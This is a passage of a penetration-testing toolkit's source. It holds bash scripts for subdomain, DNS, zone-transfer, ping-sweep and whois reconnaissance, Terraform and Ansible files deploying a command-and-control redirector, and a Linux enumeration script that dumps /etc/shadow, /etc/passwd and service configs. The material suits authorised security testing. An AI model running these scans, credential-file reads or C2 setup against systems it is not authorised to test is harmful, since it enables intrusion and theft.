 11 | YELLOW='\033[1;33m'
 12 | NC='\033[0m'
 13 | 
 14 | echo
 15 | echo -e "${YELLOW}Compare Changes to Home Pages\n\nBy Lee Baird\n${NC}"
 16 | 
 17 | # If no arguments, print usage
 18 | if [ $# -eq 0 ]; then
 19 |     echo
 20 |     echo "Where file contains a list of URLs to be compared."
 21 |     echo "Usage: $0 [options] file"
 22 |     echo
 23 |     echo "Options:"
 24 |     echo " -c Compare versions without downloading new ones."
 25 |     echo " -o Output directory. Default: ~/compare-sites"
 26 |     echo
 27 |     exit 1
 28 | fi
 29 | 
 30 | # Assign FILE and FILEHASH after confirming FILE is set
 31 | FILE="$1"
 32 | FILEHASH=$(sha256sum "$FILE" | awk '{print $1}')
 33 | HDIR="$DIR/$FILEHASH"
 34 | VERSION=1
 35 | 
 36 | ts2date(){
 37 |     date -d "1970-01-01 $1 sec"
 38 | }
 39 | 
 40 | while getopts "o:c" OPTION; do
 41 |     case $OPTION in
 42 |         o) DIR="$OPTARG" ;;
 43 |         c) DIFFONLY=true ;;
 44 |         *) usage && exit ;;
 45 |     esac
 46 | done
 47 | 
 48 | shift $((OPTIND - 1))
 49 | 
 50 | if [ ! -f "$FILE" ]; then
 51 |     echo
 52 |     echo "$MEDIUM"
 53 |     echo
 54 |     echo -e "${RED}[!] Invalid choice or entry.${NC}"
 55 |     echo
 56 |     exit 1
 57 | fi
 58 | 
 59 | # Ensure the main directory and hash directory exist
 60 | if [ ! -d "$DIR" ]; then
 61 |     mkdir -p "$DIR"
 62 | fi
 63 | 
 64 | if [ ! -d "$HDIR" ]; then
 65 |     mkdir -p "$HDIR"
 66 | fi
 67 | 
 68 | while [ -f "$HDIR/$VERSION" ]; do
 69 |     VERSION=$((VERSION + 1))
 70 | done
 71 | 
 72 | if ! "$DIFFONLY"; then
 73 |     date +%s > "$HDIR/$VERSION"
 74 |     echo
 75 |     echo
 76 |     echo "Downloading:"
 77 | 
 78 |     while IFS= read -r URL; do
 79 |         HASH=$(echo -n "$URL" | sha256sum | tr -d " -")
 80 |         echo "[*] $URL"
 81 |         if ! wget -q "$URL" -O "$HDIR/$URL-$HASH-$VERSION"; then
 82 |             echo
 83 |             echo -e "${RED}[!] Failed to download $URL${NC}"
 84 |             echo
 85 |             exit 1
 86 |         fi
 87 |     done < "$FILE"
 88 | 
 89 |     echo
 90 |     echo "$MEDIUM"
 91 | else
 92 |     VERSION=$((VERSION - 1))
 93 | fi
 94 | 
 95 | if [ "$VERSION" -gt 1 ]; then
 96 |     echo
 97 |     echo "Versions:"
 98 | 
 99 |     for ((i=1; i<=VERSION; i++)); do
100 |         echo "$i - $(ts2date "$(cat "$HDIR/$i")")"
101 |     done
102 | 
103 |     echo
104 |     echo -n "Base version: "
105 |     read -r A
106 |     echo -n "Compare with: "
107 |     read -r B
108 | 
109 |     [ -z "$A" ] && A="1"
110 |     [ -z "$B" ] && B="$VERSION"
111 | 
112 |     # Check if selected versions are valid
113 |     if [ "$A" -gt "$VERSION" ] || [ "$B" -gt "$VERSION" ]; then
114 |         echo
115 |         echo -e "${RED}[!] Selected versions exceed the available versions.${NC}"
116 |         echo
117 |         exit 1
118 |     fi
119 | 
120 |     while IFS= read -r URL; do
121 |         echo
122 |         echo "$MEDIUM"
123 |         echo
124 |         echo -e "\e[1;34m$URL\e[0m"
125 |         HASH=$(echo -n "$URL" | sha256sum | tr -d " -")
126 |         diff "$HDIR/$URL-$HASH-$A" "$HDIR/$URL-$HASH-$B" | grep '<iframe src='
127 |     done < "$FILE"
128 | fi
129 | 


--------------------------------------------------------------------------------
/misc/crawl.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | SMALL='========================================'
 6 | 
 7 | BLUE='\033[1;34m'
 8 | RED='\033[1;31m'
 9 | YELLOW='\033[1;33m'
10 | NC='\033[0m'
11 | 
12 | echo
13 | echo -e "${YELLOW}Crawl\n\nBy Lee Baird\n${NC}"
14 | echo
15 | echo "Find subdomains linked to the homepage."
16 | echo
17 | echo "Usage: target.com"
18 | echo
19 | 
20 | echo -n "Domain: "
21 | read -r DOMAIN
22 | 
23 | # Check for no answer
24 | if [ -z "$DOMAIN" ]; then
25 |     echo
26 |     echo -e "${RED}$SMALL${NC}"
27 |     echo
28 |     echo -e "${RED}[!] No domain entered.${NC}"
29 |     echo
30 |     echo -e "${RED}$SMALL${NC}"
31 |     echo
32 |     exit 1
33 | fi
34 | 
35 | # Check for a valid domain
36 | if [[ ! "$DOMAIN" =~ ^([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)+[a-zA-Z]{2,63}$ ]]; then
37 |     echo
38 |     echo -e "${RED}$SMALL${NC}"
39 |     echo
40 |     echo -e "${RED}[!] Invalid domain.${NC}"
41 |     echo
42 |     echo -e "${RED}$SMALL${NC}"
43 |     echo
44 |     exit 1
45 | fi
46 | 
47 | # Download the homepage HTML
48 | if ! wget -q "$DOMAIN" -O index.html; then
49 |     echo
50 |     echo -e "${RED}[!] Failed to download www.$DOMAIN.${NC}"
51 |     rm -f index.html
52 |     echo
53 |     exit 1
54 | fi
55 | 
56 | # Extract subdomains
57 | grep 'href=' index.html | cut -d '/' -f3 | grep "$DOMAIN" | grep -Ev "www.$DOMAIN|>" | cut -d '"' -f1 | sort -u > tmp
58 | 
59 | if [ ! -s tmp ]; then
60 |     echo
61 |     echo -e "${RED}[!] No subdomains found.${NC}"
62 |     rm -f index.html tmp
63 |     echo
64 |     exit 1
65 | else
66 |     echo
67 |     echo "$SMALL"
68 |     echo
69 |     sed 's/\?.*//' tmp | sort -u | column -t
70 |     echo
71 | fi
72 | 
73 | # Clean up
74 | rm -f index.html tmp
75 | 


--------------------------------------------------------------------------------
/misc/deploy/ansible/redirector-c2.yml:
--------------------------------------------------------------------------------
 1 | ---
 2 | 
 3 | - hosts: all
 4 |   become: yes
 5 |   tasks:
 6 |   - name: apt update
 7 |     apt:
 8 |       update_cache: yes
 9 |       cache_valid_time: 3600
10 |       force_apt_get: yes
11 | 
12 |   - name: apt -y upgrade ; apt -y dist-upgrade ; apt -y autoremove ; apt -y autoclean
13 |     apt:
14 |       update_cache: yes
15 | #      upgrade: dist
16 |       cache_valid_time: 3600
17 |       force_apt_get: yes
18 |       autoremove: yes
19 |       autoclean: yes
20 | 
21 |   - name: Install packages
22 |     apt:
23 |       name:
24 |       - apache2
25 |       - curl
26 |       - git
27 |       - locate
28 |       - net-tools
29 |       - socat
30 |       - wget
31 |       state: latest
32 | 
33 |   - name: Install Apache modules
34 |     shell: |
35 |       a2enmod headers proxy proxy_html proxy_http rewrite ssl
36 | 
37 |   - name: Start Apache
38 |     service:
39 |       name: apache2
40 |       state: started
41 | 
42 |   - name: Change Apache config to allow for mod-rewrite
43 |     ansible.builtin.replace:
44 |       path: /etc/apache2/apache2.conf
45 |       after: '<Directory /var/www/>'
46 |       before: '</Directory>'
47 |       regexp: ^\tAllowOverride None$
48 |       replace: '\tAllowOverride All'
49 | 
50 |   - name: Restart the Apache service
51 |     service:
52 |       name: apache2
53 |       state: restarted
54 | 


--------------------------------------------------------------------------------
/misc/deploy/main.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_providers {
 3 |     aws = {
 4 |       source  = "hashicorp/aws"
 5 |       version = "~> 4.16"
 6 |     }
 7 |   }
 8 | 
 9 |   required_version = ">= 1.2.0"
10 | }
11 | 
12 | provider "aws" {
13 |   region = "us-east-1"
14 | }
15 | 
16 | # ---------------------------------------------------------------------------------------------------------------------
17 | 
18 | resource "aws_instance" "redirector" {
19 |   ami                    = "ami-052efd3df9dad4825" # Ubuntu for my region
20 |   instance_type          = "t2.micro"
21 |   key_name               = "deploy" # Created in AWS GUI
22 |   vpc_security_group_ids = [aws_security_group.operators.id]
23 | 
24 |   tags = {
25 |     Name = "Redirector"
26 |   }
27 | 
28 |   provisioner "remote-exec" {
29 |     connection {
30 |       host        = aws_instance.redirector.public_ip
31 |       type        = "ssh"
32 |       user        = "ubuntu"
33 |       agent       = true
34 |       private_key = file("~/.ssh/deploy.pem")
35 |     }
36 | 
37 |     inline = ["echo; echo '[*] Connected to new server.'; echo"]
38 |   }
39 | 
40 |   provisioner "local-exec" {
41 |     command = "ansible-playbook -u ubuntu -i '${aws_instance.redirector.public_ip},' --private-key ~/.ssh/deploy.pem ansible/redirector-c2.yml"
42 |   }
43 | }
44 | 
45 | # ---------------------------------------------------------------------------------------------------------------------
46 | 
47 | resource "aws_security_group" "operators" {
48 |   egress {
49 |     from_port   = 0
50 |     to_port     = 0
51 |     protocol    = "-1"
52 |     cidr_blocks = ["0.0.0.0/0"]
53 |   }
54 |   ingress {
55 |     from_port   = 22
56 |     to_port     = 22
57 |     protocol    = "tcp"
58 |     cidr_blocks = ["<operator IPs>"]
59 |   }
60 |   ingress {
61 |     from_port   = 80
62 |     to_port     = 80
63 |     protocol    = "tcp"
64 |     cidr_blocks = ["0.0.0.0/0"]
65 |   }
66 |   ingress {
67 |     from_port   = 443
68 |     to_port     = 443
69 |     protocol    = "tcp"
70 |     cidr_blocks = ["0.0.0.0/0"]
71 |   }
72 |   ingress {
73 |     from_port   = 53
74 |     to_port     = 53
75 |     protocol    = "udp"
76 |     cidr_blocks = ["0.0.0.0/0"]
77 |   }
78 |   tags = {
79 |     Name = "Operators"
80 |   }
81 | }
82 | 


--------------------------------------------------------------------------------
/misc/deploy/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "instance_id" {
 2 |   description = "ID of payload instance"
 3 |   value       = aws_instance.redirector.id
 4 | }
 5 | 
 6 | output "instance_ip" {
 7 |   description = "Public IP of the payload instance"
 8 |   value       = aws_instance.redirector.public_ip
 9 | }
10 | 


--------------------------------------------------------------------------------
/misc/dns-forward.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | SMALL='========================================'
 6 | 
 7 | BLUE='\033[1;34m'
 8 | RED='\033[1;31m'
 9 | YELLOW='\033[1;33m'
10 | NC='\033[0m'
11 | 
12 | echo
13 | echo -e "${YELLOW}DNS Forward\n\nBy Lee Baird\n${NC}"
14 | echo
15 | echo "Show IP addresses of subdomains."
16 | echo
17 | echo "Usage: target.com"
18 | echo
19 | echo -n "Domain: "
20 | read -r DOMAIN
21 | 
22 | # Check for no answer
23 | if [ -z "$DOMAIN" ]; then
24 |     echo
25 |     echo -e "${RED}$SMALL${NC}"
26 |     echo
27 |     echo -e "${RED}[!] No domain entered.${NC}"
28 |     echo
29 |     echo -e "${RED}$SMALL${NC}"
30 |     echo
31 |     exit 1
32 | fi
33 | 
34 | # Check for a valid domain
35 | if [[ ! "$DOMAIN" =~ ^([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)+[a-zA-Z]{2,63}$ ]]; then
36 |     echo
37 |     echo -e "${RED}$SMALL${NC}"
38 |     echo
39 |     echo -e "${RED}[!] Invalid domain.${NC}"
40 |     echo
41 |     echo -e "${RED}$SMALL${NC}"
42 |     echo
43 |     exit 1
44 | fi
45 | 
46 | if [ ! -f /usr/share/dnsenum/dns.txt ]; then
47 |     echo
48 |     echo "$SMALL"
49 |     echo
50 |     echo -e "${RED}[!] Subdomain list not found at /usr/share/dnsenum/dns.txt${NC}"
51 |     echo
52 |     exit 1
53 | fi
54 | 
55 | echo
56 | echo "$SMALL"
57 | echo
58 | 
59 | # Loop through each subdomain in the list and attempt resolution
60 | while IFS= read -r i; do
61 |     if RESULT=$(host "$i.$DOMAIN" | grep 'has address'); then
62 |         echo "$RESULT" | cut -d ' ' -f1,4 >> tmp
63 |     else
64 |         echo
65 |         echo -e "${RED}[!] Failed to resolve $i.$DOMAIN${NC}"
66 |         echo
67 |         exit 1
68 |     fi
69 | done < /usr/share/dnsenum/dns.txt
70 | 
71 | # Display and sort unique results, if any
72 | if [ -s tmp ]; then
73 |     column -t tmp | sort -u
74 | else
75 |     echo -e "${RED}[!] No subdomains resolved successfully.${NC}"
76 | fi
77 | 
78 | # Clean up
79 | rm -f tmp
80 | 


--------------------------------------------------------------------------------
/misc/dns-reverse.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | MEDIUM='=================================================================='
 6 | 
 7 | BLUE='\033[1;34m'
 8 | RED='\033[1;31m'
 9 | YELLOW='\033[1;33m'
10 | NC='\033[0m'
11 | 
12 | echo
13 | echo -e "${YELLOW}DNS Reverse\n\nBy Lee Baird\n${NC}"
14 | echo
15 | echo "Perform a PTR DNS query on a Class C range and return FQDNs."
16 | echo
17 | echo "Usage: 192.168.1"
18 | echo
19 | echo -n "Class: "
20 | read -r CLASS
21 | 
22 | # Check if class is empty or invalid
23 | if [[ -z "$CLASS" || ! "$CLASS" =~ ^([0-9]{1,3}\.){2}[0-9]{1,3}$ ]]; then
24 |     echo
25 |     echo "$MEDIUM"
26 |     echo
27 |     echo -e "${RED}[!] Invalid choice or entry.${NC}"
28 |     echo
29 |     exit 1
30 | fi
31 | 
32 | echo
33 | echo "$MEDIUM"
34 | echo
35 | 
36 | # Perform PTR DNS query on each IP in the Class C range
37 | for i in {1..254}; do
38 |     # Check if the host command returns a valid PTR record
39 |     if RESULT=$(host "$CLASS.$i" | grep 'name pointer'); then
40 |         echo "$RESULT" | cut -d ' ' -f1,5
41 |     else
42 |         echo -e "${RED}[!] No PTR record for $CLASS.$i${NC}"
43 |     fi
44 | done
45 | 


--------------------------------------------------------------------------------
/misc/dns-transfer.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | SMALL='========================================'
 6 | 
 7 | BLUE='\033[1;34m'
 8 | RED='\033[1;31m'
 9 | YELLOW='\033[1;33m'
10 | NC='\033[0m'
11 | 
12 | echo
13 | echo -e "${YELLOW}DNS Transfer\n\nBy Lee Baird\n${NC}"
14 | echo
15 | echo "Check for DNS zone transfer."
16 | echo
17 | echo "Usage: target.com"
18 | echo
19 | echo -n "Domain: "
20 | read -r DOMAIN
21 | 
22 | # Check for no answer
23 | if [ -z "$DOMAIN" ]; then
24 |     echo
25 |     echo -e "${RED}$SMALL${NC}"
26 |     echo
27 |     echo -e "${RED}[!] No domain entered.${NC}"
28 |     echo
29 |     echo -e "${RED}$SMALL${NC}"
30 |     echo
31 |     exit 1
32 | fi
33 | 
34 | # Check for a valid domain
35 | if [[ ! "$DOMAIN" =~ ^([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)+[a-zA-Z]{2,63}$ ]]; then
36 |     echo
37 |     echo -e "${RED}$SMALL${NC}"
38 |     echo
39 |     echo -e "${RED}[!] Invalid domain.${NC}"
40 |     echo
41 |     echo -e "${RED}$SMALL${NC}"
42 |     echo
43 |     exit 1
44 | fi
45 | 
46 | echo
47 | echo "$SMALL"
48 | echo
49 | 
50 | # Perform DNS zone transfer check
51 | for i in $(host -t ns "$DOMAIN" | cut -d ' ' -f4 | sed 's/\.\s*$//'); do
52 |     echo "[*] Checking name server: $i"
53 | 
54 |     # Check if the DNS zone transfer is successful
55 |     if host -l "$DOMAIN" "$i" > /dev/null 2>&1; then
56 |         host -l "$DOMAIN" "$i"
57 |     else
58 |         echo -e "${RED}[!] Failed.${NC}"
59 |         echo
60 |     fi
61 | done
62 | 


--------------------------------------------------------------------------------
/misc/enum-linux.sh:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env bash
  2 | 
  3 | # by Lee Baird (@discoverscripts)
  4 | 
  5 | MEDIUM='=================================================================='
  6 | 
  7 | BLUE='\033[1;34m'
  8 | RED='\033[1;31m'
  9 | YELLOW='\033[1;33m'
 10 | NC='\033[0m'
 11 | 
 12 | echo
 13 | echo -e "${YELLOW}Enumerate Remote Linux Box\n\nBy Lee Baird\n${NC}"
 14 | 
 15 | # If no arguments, print usage and exit
 16 | if [ $# -eq 0 ]; then
 17 |     echo
 18 |     echo "Usage: $0 user@targetIP"
 19 |     echo
 20 |     exit 1
 21 | fi
 22 | 
 23 | HNAME=$(ssh "$1" hostname)
 24 | FNDATE=$(date +%b-%d-%Y_%H.%M.%Z)
 25 | OUTPUT_FILE="$HOME/$HNAME-$FNDATE.txt"
 26 | 
 27 | # Establish SSH session and run remote enumeration
 28 | ssh -M -S discover.socket -f -N "$1" misc/enum-linux.sh
 29 | ssh -S discover.socket -O exit "$1" &>/dev/null
 30 | 
 31 | # Trap to ensure cleanup on exit
 32 | trap 'rm -f tmp tmp2' EXIT
 33 | 
 34 | # Function to append section output to tmp file
 35 | function add_section(){
 36 |     echo "$1" >> tmp
 37 |     echo >> tmp
 38 |     eval "$2" >> tmp 2>/dev/null
 39 |     echo >> tmp
 40 |     echo "$MEDIUM" >> tmp
 41 |     echo >> tmp
 42 | }
 43 | 
 44 | # Clear tmp file initially
 45 | echo > tmp
 46 | 
 47 | # Date and Host Infos
 48 | date +"%b %-d, %Y %-I:%M%P %Z" >> tmp
 49 | echo >> tmp
 50 | 
 51 | add_section "[*] Hostname" "ssh ""$1"" /bin/hostname"
 52 | add_section "[*] Whoami" "whoami"
 53 | add_section "[*] Kernel" "uname -a"
 54 | add_section "[*] System uptime" "uptime"
 55 | 
 56 | # User and Group Info
 57 | add_section "[*] Users" "cat /etc/passwd"
 58 | add_section "[*] Passwords" "cat /etc/shadow"
 59 | add_section "[*] User groups" "cat /etc/group"
 60 | add_section "[*] Last 25 logins" "last -25"
 61 | 
 62 | # Network and Listening Ports
 63 | add_section "[*] Listening ports" "netstat -ant"
 64 | add_section "[*] Filesystem stats" "mount && /bin/df -h"
 65 | add_section "[*] Processes" "ps aux"
 66 | 
 67 | # Networking
 68 | add_section "[*] Networking" "/sbin/ifconfig -a; /sbin/route -e; /sbin/iptables -L -v"
 69 | add_section "[*] /etc/resolv.conf" "cat /etc/resolv.conf"
 70 | add_section "[*] SSH config" "cat /etc/ssh/sshd_config"
 71 | add_section "[*] /etc/hosts" "cat /etc/hosts"
 72 | add_section "[*] Network Configuration" "ls -R /etc/network"
 73 | 
 74 | # Config files
 75 | CONFIG_FILES=(
 76 |     "[*] /etc/apache2/apache2.conf"
 77 |     "[*] /etc/apache2/ports.conf"
 78 |     "[*] /etc/nginx/nginx.conf"
 79 |     "[*] /etc/snort/snort.conf"
 80 |     "[*] /etc/mysql/my.cnf"
 81 |     "[*] /etc/ufw/ufw.conf"
 82 |     "[*] /etc/security/access.conf"
 83 |     "[*] /etc/ldap/ldap.conf"
 84 |     "[*] /etc/proxychains.conf"
 85 | )
 86 | 
 87 | for FILE in "${CONFIG_FILES[@]}"; do
 88 |     add_section "$FILE" "cat $FILE"
 89 | done
 90 | 
 91 | # Misc
 92 | add_section "[*] Samba config" "cat /etc/samba/smb.conf"
 93 | add_section "[*] CUPS config" "cat /etc/cups/cups.conf"
 94 | add_section "[*] Service Status" "service --status-all"
 95 | add_section "[*] Installed Packages" "/usr/bin/dpkg -l"
 96 | 
 97 | # Save the final report and clean up
 98 | mv tmp "$OUTPUT_FILE"
 99 | 
100 | echo
101 | echo "$MEDIUM"
102 | echo
103 | echo "Scan complete."
104 | echo
105 | echo -e "The new report is located at ${YELLOW}$OUTPUT_FILE${NC}"
106 | echo
107 | 


--------------------------------------------------------------------------------
/misc/netblocks.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | OUTPUT_FILE="$HOME/netblocks.txt"
 6 | MEDIUM='=================================================================='
 7 | 
 8 | BLUE='\033[1;34m'
 9 | RED='\033[1;31m'
10 | YELLOW='\033[1;33m'
11 | NC='\033[0m'
12 | 
13 | echo
14 | echo -e "${YELLOW}Netblocks\n\nBy Lee Baird\n${NC}"
15 | echo
16 | echo "This returns a list of Class A owners."
17 | echo
18 | echo -n "Do you wish to continue? (y/N) "
19 | read -r CHOICE
20 | 
21 | # Give the user the option to quit
22 | if [[ -z "$CHOICE" || "$CHOICE" =~ ^[Nn]$ ]]; then
23 |     echo
24 |     exit
25 | elif [[ ! "$CHOICE" =~ ^[Yy]$ ]]; then
26 |     echo
27 |     echo "$MEDIUM"
28 |     echo
29 |     echo -e "${RED}[!] Invalid choice.${NC}"
30 |     echo
31 |     exit 1
32 | fi
33 | 
34 | echo
35 | echo "[*] Takes about 100 sec."
36 | echo
37 | 
38 | # Set up trap to ensure cleanup on exit
39 | trap 'rm -f tmp tmp2' EXIT
40 | 
41 | # Fetch and filter whois data for each Class A IP
42 | for i in $(seq 1 255); do
43 |     echo "Querying whois for $i.0.0.0."
44 |     whois "$i.0.0.0" | grep -E 'CIDR|OrgName' >> tmp
45 |     echo >> tmp
46 | done
47 | 
48 | # Clean and format output
49 | grep -Eiv '%|no address' tmp > tmp2
50 | cat -s tmp2 > "$OUTPUT_FILE"
51 | 
52 | # Clean up
53 | rm -f tmp*
54 | 
55 | echo
56 | echo "$MEDIUM"
57 | echo
58 | echo "[*] Query complete."
59 | echo
60 | echo -e "Results saved to ${YELLOW}$OUTPUT_FILE${NC}"
61 | echo
62 | 


--------------------------------------------------------------------------------
/misc/ping-sweep.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | MEDIUM='=================================================================='
 6 | 
 7 | BLUE='\033[1;34m'
 8 | RED='\033[1;31m'
 9 | YELLOW='\033[1;33m'
10 | NC='\033[0m'
11 | 
12 | echo
13 | echo -e "${YELLOW}Ping Sweep\n\nBy Lee Baird\n${NC}"
14 | echo
15 | echo "Ping sweep a Class C."
16 | echo
17 | echo "Usage: 192.168.1"
18 | echo
19 | echo -n "Class: "
20 | read -r CLASS
21 | 
22 | # Check for a valid Class C
23 | if [[ -z "$CLASS" || ! "$CLASS" =~ ^([0-9]{1,3}\.){2}[0-9]{1,3}$ ]]; then
24 |     echo
25 |     echo "$MEDIUM"
26 |     echo
27 |     echo -e "${RED}[!] Invalid choice or entry.${NC}"
28 |     echo
29 |     exit 1
30 | fi
31 | 
32 | echo
33 | echo "$MEDIUM"
34 | echo
35 | echo "[*] Pinging each IP in $CLASS.0/24."
36 | 
37 | # Ping sweep with controlled concurrency
38 | for i in $(seq 1 254); do
39 |     ping -c1 -W 1 "$CLASS.$i" | grep 'bytes from' | awk -F'[: ]+' '{print "[*] Active IP:", $4}' &
40 |     # Limit concurrent pings
41 |     if (( i % 10 == 0 )); then
42 |         wait
43 |     fi
44 | done
45 | 
46 | # Wait for all background processes to complete
47 | wait
48 | echo
49 | echo "$MEDIUM"
50 | echo
51 | echo -e "${BLUE}Ping sweep complete.${NC}"
52 | echo
53 | 


--------------------------------------------------------------------------------
/misc/rebrand.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | MEDIUM='=================================================================='
 6 | 
 7 | BLUE='\033[1;34m'
 8 | RED='\033[1;31m'
 9 | YELLOW='\033[1;33m'
10 | NC='\033[0m'
11 | 
12 | echo
13 | echo -e "${YELLOW}Rebrand\n\nBy Lee Baird\n${NC}"
14 | echo
15 | echo -n "Enter the location of your folder: "
16 | read -r LOCATION
17 | 
18 | # Check for no answer
19 | if [ -z "$LOCATION" ]; then
20 |     echo
21 |     echo "$MEDIUM"
22 |     echo
23 |     echo -e "${RED}[!] Invalid choice or entry.${NC}"
24 |     echo
25 |     exit 1
26 | fi
27 | 
28 | # Check for wrong answer
29 | if [ ! -d "$LOCATION" ]; then
30 |     echo
31 |     echo "$MEDIUM"
32 |     echo
33 |     echo -e "${RED}[!] Invalid choice or entry.${NC}"
34 |     echo
35 |     exit 1
36 | fi
37 | 
38 | cd "$LOCATION" || exit
39 | 
40 | # Check if index.htm exists
41 | if [ ! -f index.htm ]; then
42 |     echo
43 |     echo -e "${RED}[!] index.htm not found in $LOCATION.${NC}"
44 |     echo
45 |     exit 1
46 | fi
47 | 
48 | # Update link in index.htm
49 | sed -i 's|href="https://github.com/leebaird/discover"|href="https://www.acme.org"|g' index.htm
50 | cd pages/ || exit
51 | sed -i 's|href="https://github.com/leebaird/discover"|href="https://www.acme.org"|g' *.htm
52 | 
53 | # Open updated index.htm in Firefox
54 | firefox ../index.htm &
55 | 


--------------------------------------------------------------------------------
/misc/recon-ng.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | echo "recon-ng"
 6 | echo
 7 | echo "For historic purposes."
 8 | exit
 9 | 
10 | echo "marketplace refresh" > passive.rc
11 | echo "marketplace install all" >> passive.rc
12 | echo "workspaces create $DOMAIN" >> passive.rc
13 | echo "db insert companies" >> passive.rc
14 | echo "$COMPANYURL" >> passive.rc
15 | sed -i 's/%26/\&/g; s/%20/ /g; s/%2C/\,/g' passive.rc
16 | echo "none" >> passive.rc
17 | echo "none" >> passive.rc
18 | echo "db insert domains" >> passive.rc
19 | echo "$DOMAIN" >> passive.rc
20 | echo "none" >> passive.rc
21 | 
22 | if [ -f emails ]; then
23 |     cp emails /tmp/tmp-emails
24 |     cat "$DISCOVER"/resource/recon-ng-import-emails.rc >> passive.rc
25 | fi
26 | 
27 | if [ -f names ]; then
28 |     echo "last_name#first_name#title" > /tmp/names.csv
29 |     cat names >> /tmp/names.csv
30 |     cat "$DISCOVER"/resource/recon-ng-import-names.rc >> passive.rc
31 | fi
32 | 
33 | cat "$DISCOVER"/resource/recon-ng.rc >> passive.rc
34 | cat "$DISCOVER"/resource/recon-ng-cleanup.rc >> passive.rc
35 | sed -i "s/yyy/$DOMAIN/g" passive.rc
36 | 
37 | recon-ng -r "$PWD"/passive.rc
38 | 
39 | ###############################################################################################################################
40 | 
41 | grep '@' /tmp/emails | awk '{print $2}' | grep -Eiv '(>|query|select)' | sort -u > emails2
42 | cat emails emails2 | sort -u > emails-final
43 | 
44 | grep '|' /tmp/names | grep -v last_name | sort -u | sed 's/|/ /g' | sed 's/^[ \t]*//' | sed 's/[ \t]*$//' > names-final
45 | 
46 | grep '/' /tmp/networks | grep -v 'Spooling' | awk '{print $2}' | $SIP > tmp
47 | cat tmp networks | sort -u | $SIP > networks-final
48 | 
49 | grep "\.$DOMAIN" /tmp/subdomains | grep -Eiv '(\*|%|>|select|www)' | awk '{print $2,$4}' | sed 's/|//g' | column -t | sort -u > tmp
50 | #cat subdomains tmp | grep -E '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' | grep -Eiv '(outlook|www)' | tr 'A-Z' 'a-z' | column -t | sort -u | sed 's/[ \t]*$//' > subdomains-final
51 | cat subdomains tmp | grep -Eiv '(outlook|www)' | tr 'A-Z' 'a-z' | column -t | sort -u | sed 's/[ \t]*$//' > subdomains-final
52 | 
53 | # Find hosts
54 | cat z* subdomains-final | grep -E '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' | grep -Eiv '(0.0.0.0|1.1.1.1|1.1.1.2|8.8.8.8|127.0.0.1)' | sort -u | $SIP > hosts
55 | 
56 | find . -type f -empty -delete
57 | 


--------------------------------------------------------------------------------
/misc/subdomains-from-ssl.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | SMALL='========================================'
 6 | 
 7 | BLUE='\033[1;34m'
 8 | RED='\033[1;31m'
 9 | YELLOW='\033[1;33m'
10 | NC='\033[0m'
11 | 
12 | echo
13 | echo -e "${YELLOW}Subdomains from SSL\n\nBy Lee Baird\n${NC}"
14 | echo
15 | echo -n "Enter a domain: "
16 | read -r DOMAIN
17 | 
18 | # Check for no answer
19 | if [ -z "$DOMAIN" ]; then
20 |     echo
21 |     echo -e "${RED}$SMALL${NC}"
22 |     echo
23 |     echo -e "${RED}[!] No domain entered.${NC}"
24 |     echo
25 |     echo -e "${RED}$SMALL${NC}"
26 |     echo
27 |     exit 1
28 | fi
29 | 
30 | # Check for a valid domain
31 | if [[ ! "$DOMAIN" =~ ^([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)+[a-zA-Z]{2,}$ ]]; then
32 |     echo
33 |     echo -e "${RED}$SMALL${NC}"
34 |     echo
35 |     echo -e "${RED}[!] Invalid domain.${NC}"
36 |     echo
37 |     echo -e "${RED}$SMALL${NC}"
38 |     echo
39 |     exit 1
40 | fi
41 | 
42 | # Run sslyze and extract subdomains
43 | sslyze "$DOMAIN" --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers > tmp
44 | 
45 | # Extract and format subject alternative names
46 | grep 'X509v3 Subject Alternative Name:' tmp | sed 's/      X509v3 Subject Alternative Name:   //g; s/, DNS:/\n/g; s/www.//g; s/DNS://g' > tmp2
47 | 
48 | # Remove trailing whitespace from each line
49 | sed 's/[ \t]*$//' tmp2 | sort -u > tmp3
50 | 
51 | # Display the extracted subdomains
52 | echo
53 | echo "$SMALL"
54 | echo
55 | echo "Extracted Subdomains:"
56 | cat tmp3
57 | 
58 | # Clean up
59 | rm tmp*
60 | 


--------------------------------------------------------------------------------
/multiTabs.sh:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env bash
  2 | 
  3 | # by Lee Baird (@discoverscripts)
  4 | 
  5 | f_runlocally
  6 | clear
  7 | f_banner
  8 | 
  9 | # Check if Firefox is running
 10 | if pgrep firefox > /dev/null; then
 11 |     echo
 12 |     echo "[!] Close Firefox before running script."
 13 |     echo
 14 |     exit 1
 15 | fi
 16 | 
 17 | echo -e "${BLUE}Open multiple tabs in Firefox with:${NC}"
 18 | echo
 19 | echo "1.  List"
 20 | echo "2.  Files in a directory"
 21 | echo "3.  Directories in robots.txt"
